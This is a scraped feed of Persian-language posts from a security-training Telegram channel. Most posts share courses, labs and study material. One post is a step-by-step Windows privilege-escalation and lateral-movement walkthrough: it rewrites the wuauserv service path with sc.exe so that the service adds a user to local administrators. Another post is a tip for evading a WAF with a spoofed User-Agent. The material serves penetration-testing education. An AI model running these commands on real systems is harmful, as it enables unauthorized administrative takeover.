Printer Hacking 101.pdf
1.7 MB
Printer Hacking 101
با هک چاپگر آشنا شوید و با آن آشنا شوید و اصول اولیه IPP را بدانید.
#PrinterHacking
@TryHackBox
با هک چاپگر آشنا شوید و با آن آشنا شوید و اصول اولیه IPP را بدانید.
#PrinterHacking
@TryHackBox
👍8👎1
Hacking with PowerShell @TryHackBox.pdf
1 MB
Hacking with PowerShell
اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
#powershell
@TryHackBox
اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
#powershell
@TryHackBox
❤5
پیکربندی ناامن ACL های سرویس از طریق group policies
سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.
پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
ما فقط به گروه AU علاقه مندیم:
- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.
ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.
اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که میخواهیم در رایانه انجام دهیم تغییر میدهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه میکنیم.
سرویس را شروع کنید:
اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.
ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
پس از به دست آوردن دسترسی local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.
#RedTeam #PurpleTeam #LPE
@TryHackBox
سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.
پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users - S-1-5-11 .
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
ما فقط به گروه AU علاقه مندیم:
- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.
ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.
MATCH(g:GPO {name:"VULNSERVICE@DOMAIN.LOCAL"})-[:GPLink|Contains*1..]->(c:Computer) RETURN c.nameاگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
sc.exe qc wuauserv
ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که میخواهیم در رایانه انجام دهیم تغییر میدهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه میکنیم.
sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"
سرویس را شروع کنید:
sc.exe start wuauserv
اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
sc.exe stop wuauserv
sc.exe start wuauserv
در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.
ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
sc.exe \\server start wuauserv
اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add"
sc.exe \\server start wuauserv
پس از به دست آوردن دسترسی local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.
#RedTeam #PurpleTeam #LPE
@TryHackBox
👍5🔥3
Media is too big
VIEW IN TELEGRAM
Pro's vs. Joes
چگونه یک لابراتور برای خودمون بسازیم
#Lab
@TryHackBox
@Home Edition Presents: "Building A Monster Lab" w/ Jeff McJunkinچگونه یک لابراتور برای خودمون بسازیم
#Lab
@TryHackBox
👍8
دوستان به زودی فعالیتمون در یوتیوب شروع میشه خوشحال میشم حمایتمون کنید به زودی ...
فعالیتمون در یوتیوب مباحث تست نفوذ شبکه هست
فعالیتمون در یوتیوب مباحث تست نفوذ شبکه هست
👌19👍3
هنری که با خرد همراه نباشد، همچو مرگی که است که بر تن چیره گشته…
«برگرفته از اندرزنامه پهلویِ دستور آذرباد ماراسپندان»
@TryHackBox
«برگرفته از اندرزنامه پهلویِ دستور آذرباد ماراسپندان»
@TryHackBox
❤9
یک منبع رایگان برای یادگیری مقدماتی Frida برای دوستانی که در زمینه پنتست اپلیکیشن های موبایل فعالیت دارند:
https://www.mobilehackinglab.com/course/android-frida-labs
@TryHackBoxOfficial
https://www.mobilehackinglab.com/course/android-frida-labs
@TryHackBoxOfficial
Mobile Hacking Lab
Android Frida Labs - Free Course
This comprehensive Frida course for Android dives into the powerful capabilities of Frida, a dynamic instrumentation toolkit. Designed for both beginners and advanced users, the course covers essential concepts and techniques for leveraging Frida in Android…
🔥4
Try Hack Box
Full Introduction to Cyber Security TryHackBox.pdf
نسخه قبلی دوستان گقتند واترمارکش پررنگه تو این نسخه اصلاح شد
❤7
به کدام حوزه تست نفوذ و امنیت علاقه مند هستید ؟
Final Results
23%
تست نفوذ شبکه
33%
تست نفوذ وب
34%
هردو
10%
امنیت شبکه
❤8
Forwarded from TryHackBox
⭕ دوستان ما قصد داریم کتابهایی رو در زمینه حوزه تهاجمی هست رو ترجمه کنیم برای اینکار تصمیم گرفتیم که یک تیم تشکیل بدیم تا بتوانیم به جامعه سایبری پارسی زبان کمک کنیم و ارائه هایی خوبی برای علاقه مندان داشته باشیم .
✴ اگر دوست دارید کمک کنید و زبان خوبی ندارید میتونید از ترنسلیت استفاده کنید ما در اخر مطالب را ویرایش میکنیم و مطالبی که ترجمه تخصصی نشدند را اصلاح میکنیم .
✳ اگر مایل به پیوستند به تیم ما هستید با ما در ارتباط باشید :
🔆 @Unique_exploitBot
✴ اگر دوست دارید کمک کنید و زبان خوبی ندارید میتونید از ترنسلیت استفاده کنید ما در اخر مطالب را ویرایش میکنیم و مطالبی که ترجمه تخصصی نشدند را اصلاح میکنیم .
✳ اگر مایل به پیوستند به تیم ما هستید با ما در ارتباط باشید :
🔆 @Unique_exploitBot
👍6🔥4
Forwarded from Try Hack Box (Sʜᴀʀᴋ Dᴀʀᴋ)
👍13❤2
🔖 40 پورت معمولاً هدفمند توسط هکرها
🔒 Port 21 (FTP)
🚪 Port 22 (SSH)
💻 Port 23 (Telnet)
📧 Port 25 (SMTP)
🌐 Port 53 (DNS)
🌐 Port 80 (HTTP)
🔒 Port 443 (HTTPS)
🎮 Port 3074 (Xbox Live)
📲 Port 5060 (SIP)
🎲 Port 8080 (Proxy)
📁 Port 135 (RPC)
🖥️ Port 139 (NetBIOS)
🔓 Port 1433 (MSSQL)
🎲 Port 1521 (Oracle)
🔓 Port 1723 (PPTP)
📤 Port 1900 (UPnP)
🎮 Port 2302 (DayZ)
🖨️ Port 3389 (RDP)
🔒 Port 3306 (MySQL)
🕸️ Port 4000 (Elasticsearch)
📂 Port 4444 (Metasploit)
📤 Port 5000 (Python Flask)
🎮 Port 5555 (Android Debug Bridge)
📤 Port 5900 (VNC)
🖥️ Port 6667 (IRC)
📧 Port 6697 (IRC SSL)
📂 Port 8000 (HTTP Alt)
🖥️ Port 8081 (HTTP Proxy)
🔓 Port 9100 (Printer)
📂 Port 9090 (Web Debugging)
📁 Port 445 (SMB)
💻 Ports 5985/5986 (WinRM)
🔄 Port 6379 (Redis)
📂 Port 6666 (IRC)
📧 Port 993 (IMAP SSL)
🔒 Port 995 (POP3 SSL)
🎲 Port 1434 (Microsoft SQL Monitor)
📂 Port 27017 (MongoDB)
🌐 Port 28017 (MongoDB HTTP Interface)
#Port
@TryHackBox
🔒 Port 21 (FTP)
🚪 Port 22 (SSH)
💻 Port 23 (Telnet)
📧 Port 25 (SMTP)
🌐 Port 53 (DNS)
🌐 Port 80 (HTTP)
🔒 Port 443 (HTTPS)
🎮 Port 3074 (Xbox Live)
📲 Port 5060 (SIP)
🎲 Port 8080 (Proxy)
📁 Port 135 (RPC)
🖥️ Port 139 (NetBIOS)
🔓 Port 1433 (MSSQL)
🎲 Port 1521 (Oracle)
🔓 Port 1723 (PPTP)
📤 Port 1900 (UPnP)
🎮 Port 2302 (DayZ)
🖨️ Port 3389 (RDP)
🔒 Port 3306 (MySQL)
🕸️ Port 4000 (Elasticsearch)
📂 Port 4444 (Metasploit)
📤 Port 5000 (Python Flask)
🎮 Port 5555 (Android Debug Bridge)
📤 Port 5900 (VNC)
🖥️ Port 6667 (IRC)
📧 Port 6697 (IRC SSL)
📂 Port 8000 (HTTP Alt)
🖥️ Port 8081 (HTTP Proxy)
🔓 Port 9100 (Printer)
📂 Port 9090 (Web Debugging)
📁 Port 445 (SMB)
💻 Ports 5985/5986 (WinRM)
🔄 Port 6379 (Redis)
📂 Port 6666 (IRC)
📧 Port 993 (IMAP SSL)
🔒 Port 995 (POP3 SSL)
🎲 Port 1434 (Microsoft SQL Monitor)
📂 Port 27017 (MongoDB)
🌐 Port 28017 (MongoDB HTTP Interface)
#Port
@TryHackBox
👍17🔥4
برای آنکه به بدی و (خساست) شهرت نیابید آنچه را که از آموزگاران خود آموختید با سخاوت و رادی به دیگران عرضه دارید.
«بخشی از نسک سومِ دینکردِ پاک»
@TryHackBox
«بخشی از نسک سومِ دینکردِ پاک»
@TryHackBox
👍27
This media is not supported in your browser
VIEW IN TELEGRAM
۷ آبان ماه، روز کوروش بزرگ
پدر ایران زمین خجسته باد .
دوشنبه (مهشید) هفتم، روز امرداد از ماه آبان، روز پدر ایرانشهر، روز کوروش بزرگ، شاه ایران، شاه چهارگوشه، بر هماک بهدینان و نیکان و خوبان ایران و انیران شاد بواد.
@TryHackBox
پدر ایران زمین خجسته باد .
دوشنبه (مهشید) هفتم، روز امرداد از ماه آبان، روز پدر ایرانشهر، روز کوروش بزرگ، شاه ایران، شاه چهارگوشه، بر هماک بهدینان و نیکان و خوبان ایران و انیران شاد بواد.
@TryHackBox
❤9👎3👍1
🔖 نکات باگ بانتی
🥷 هنگام استفاده از ffuf یا ابزارهای دیگر (که در هر درخواست یک User-Agent می فرستند)، هیچ کس فکر نمی کند که هدرهای HTTP پیش فرض (Fuzz Faster U Fool در مورد ffuf) می توانند WAF را مسدود کنند. فقط آن را به چیزی شبیه به:
#bugbounty #tips #recon
@TryHackBox
🥷 هنگام استفاده از ffuf یا ابزارهای دیگر (که در هر درخواست یک User-Agent می فرستند)، هیچ کس فکر نمی کند که هدرهای HTTP پیش فرض (Fuzz Faster U Fool در مورد ffuf) می توانند WAF را مسدود کنند. فقط آن را به چیزی شبیه به:
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
#bugbounty #tips #recon
@TryHackBox
👍8❤2
RoadMap For Network Penetration Testing By TryHackBox.pdf
30.7 KB
نقشه راه تست نفوذ شبکه
🔖 یک نکته : به ترتیب نیاز نیست همشو برید این یک نگاه کلی هست که اینایی که داخلش هست رو بلد باشید دوستان .
✍️ Kaveh
@TryHackBoxOfficial
🔖 یک نکته : به ترتیب نیاز نیست همشو برید این یک نگاه کلی هست که اینایی که داخلش هست رو بلد باشید دوستان .
✍️ Kaveh
@TryHackBoxOfficial
🔥9